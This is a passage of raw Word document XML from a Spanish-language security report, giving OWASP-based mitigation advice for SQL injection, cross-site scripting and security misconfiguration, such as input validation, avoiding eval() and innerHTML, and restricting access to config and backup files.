          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D04A9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Ayuda a bloquear patrones comunes de inyección SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B624F3D" w14:textId="77777777" w:rsidR="003D04A9" w:rsidRPr="003D04A9" w:rsidRDefault="003D04A9" w:rsidP="003563E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F134C35" w14:textId="613D5C29" w:rsidR="003D04A9" w:rsidRPr="003D04A9" w:rsidRDefault="003D04A9" w:rsidP="003563E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D04A9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Realizar pruebas periódicas de seguridad:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455DB2D7" w14:textId="7A584E27" w:rsidR="003D04A9" w:rsidRDefault="003D04A9" w:rsidP="003563E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D04A9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Utilizar herramientas como </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003D04A9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>SQLmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003D04A9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> para identificar posibles vulnerabilidades en el sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5B77A0" w14:textId="7451C4A4" w:rsidR="00E551EE" w:rsidRDefault="00E551EE" w:rsidP="00E551EE">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="623D4EE9" w14:textId="7A795296" w:rsidR="00E551EE" w:rsidRPr="007930F0" w:rsidRDefault="00667A64" w:rsidP="00E551EE">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">A3 </w:t>
      </w:r>
      <w:r w:rsidR="00E551EE" w:rsidRPr="007930F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Cross-Site Scripting (XSS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5715207D" w14:textId="608C2E47" w:rsidR="00E551EE" w:rsidRDefault="00E551EE" w:rsidP="00E551EE">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CD855F2" w14:textId="19CBF5E4" w:rsidR="00E551EE" w:rsidRDefault="00E551EE" w:rsidP="00E551EE">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Se sugiere inicialmente validar la siguiente página para mitigar un poco más los riesgos </w:t>
      </w:r>
      <w:hyperlink r:id="rId30" w:history="1">
        <w:r w:rsidRPr="000A7673">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="es-ES"/>
          </w:rPr>
          <w:t>https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2030BC96" w14:textId="6B9FB83A" w:rsidR="00E551EE" w:rsidRDefault="00E551EE" w:rsidP="00E551EE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A05F379" w14:textId="31810274" w:rsidR="007F02BD" w:rsidRDefault="007F02BD" w:rsidP="007F02BD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Por otra parte, para prevenir esta vulnerabilidad en aplicaciones reales, se recomienda:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215A1EFC" w14:textId="77777777" w:rsidR="007F02BD" w:rsidRDefault="007F02BD" w:rsidP="007F02BD">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19635B9A" w14:textId="6751E391" w:rsidR="007F02BD" w:rsidRPr="007F02BD" w:rsidRDefault="007F02BD" w:rsidP="007F02BD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F02BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Validar y corregir entradas:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BDE350" w14:textId="3FE73B09" w:rsidR="007F02BD" w:rsidRDefault="007F02BD" w:rsidP="007F02BD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Verificar todos los datos ingresados por el usuario en el lado del servidor y del cliente. Utilizar funciones que eliminen caracteres peligrosos y de código como </w:t>
      </w:r>
      <w:r w:rsidRPr="007F02BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>&lt; &gt; “ ‘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBC6782" w14:textId="77777777" w:rsidR="007F02BD" w:rsidRDefault="007F02BD" w:rsidP="007F02BD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="426EB9E7" w14:textId="3A67F975" w:rsidR="007F02BD" w:rsidRDefault="007F02BD" w:rsidP="007F02BD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F02BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Evitar el uso de funciones inseguras:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D9D386" w14:textId="2B0B8463" w:rsidR="007F02BD" w:rsidRDefault="007F02BD" w:rsidP="007F02BD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">No utilizar funciones </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>eval</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">() o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>innerHTML</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> para procesar datos ingresados por el usuario.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E2A3CD" w14:textId="217AE007" w:rsidR="007F02BD" w:rsidRDefault="007F02BD" w:rsidP="007F02BD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01F13647" w14:textId="77777777" w:rsidR="003617F5" w:rsidRDefault="003617F5" w:rsidP="007F02BD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62683FC4" w14:textId="5E7536C8" w:rsidR="007F02BD" w:rsidRPr="007F02BD" w:rsidRDefault="007F02BD" w:rsidP="007F02BD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Pruebas regulares de seguridad:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C386F9" w14:textId="4D7032DB" w:rsidR="007F02BD" w:rsidRDefault="007F02BD" w:rsidP="007F02BD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Realizar escaneos automáticos y manuales para detectar XSS con herramientas existentes como OWASP ZAP o Burp Suite.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645BD180" w14:textId="77777777" w:rsidR="002059C6" w:rsidRDefault="002059C6" w:rsidP="007F02BD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29B2D721" w14:textId="2CD65D6F" w:rsidR="007930F0" w:rsidRDefault="007930F0" w:rsidP="007930F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36CB3EDF" w14:textId="5B6EE19F" w:rsidR="007930F0" w:rsidRPr="007930F0" w:rsidRDefault="00EA1B01" w:rsidP="007930F0">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">A5 </w:t>
      </w:r>
      <w:r w:rsidR="007930F0" w:rsidRPr="007930F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Security Misconfiguration (Configuración de Seguridad Incorrecta)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012348BF" w14:textId="0924E09F" w:rsidR="007930F0" w:rsidRDefault="007930F0" w:rsidP="007930F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C0651D4" w14:textId="7C67479B" w:rsidR="007930F0" w:rsidRDefault="007930F0" w:rsidP="007930F0">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Se sugiere inicialmente validar la siguiente página para mitigar un poco más los riesgos </w:t>
      </w:r>
      <w:hyperlink r:id="rId31" w:history="1">
        <w:r w:rsidRPr="007930F0">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="es-ES"/>
          </w:rPr>
          <w:t>https://owasp.org/Top10/A05_2021-Security_Misconfiguration/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="497E2016" w14:textId="77777777" w:rsidR="007930F0" w:rsidRDefault="007930F0" w:rsidP="007930F0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06A1BF64" w14:textId="77777777" w:rsidR="007930F0" w:rsidRDefault="007930F0" w:rsidP="007930F0">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Por otra parte, para prevenir esta vulnerabilidad en aplicaciones reales, se recomienda:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C9EFED" w14:textId="77777777" w:rsidR="007930F0" w:rsidRPr="007930F0" w:rsidRDefault="007930F0" w:rsidP="007930F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56A80826" w14:textId="22FE5516" w:rsidR="002059C6" w:rsidRPr="007F02BD" w:rsidRDefault="004045C5" w:rsidP="004045C5">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Eliminar configuraciones por defecto</w:t>
      </w:r>
      <w:r w:rsidR="002059C6" w:rsidRPr="007F02BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43377D25" w14:textId="7CCD9A40" w:rsidR="002059C6" w:rsidRDefault="004045C5" w:rsidP="002059C6">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Revisar que no existan configuraciones predeterminadas en el entorno de producción.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D84677C" w14:textId="77777777" w:rsidR="002059C6" w:rsidRDefault="002059C6" w:rsidP="002059C6">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B82C2A8" w14:textId="6EADF58A" w:rsidR="002059C6" w:rsidRDefault="004045C5" w:rsidP="004045C5">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Restringir el acceso a archivos y directorios sensibles</w:t>
      </w:r>
      <w:r w:rsidR="002059C6" w:rsidRPr="007F02BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7272933A" w14:textId="3F92CA6F" w:rsidR="002059C6" w:rsidRDefault="004045C5" w:rsidP="002059C6">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Proteger los archivos como config, logs o backup con permisos adecuados y evitar su exposición pública.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3086FD00" w14:textId="77777777" w:rsidR="002059C6" w:rsidRDefault="002059C6" w:rsidP="002059C6">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45A4B640" w14:textId="77777777" w:rsidR="002059C6" w:rsidRPr="007F02BD" w:rsidRDefault="002059C6" w:rsidP="004045C5">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
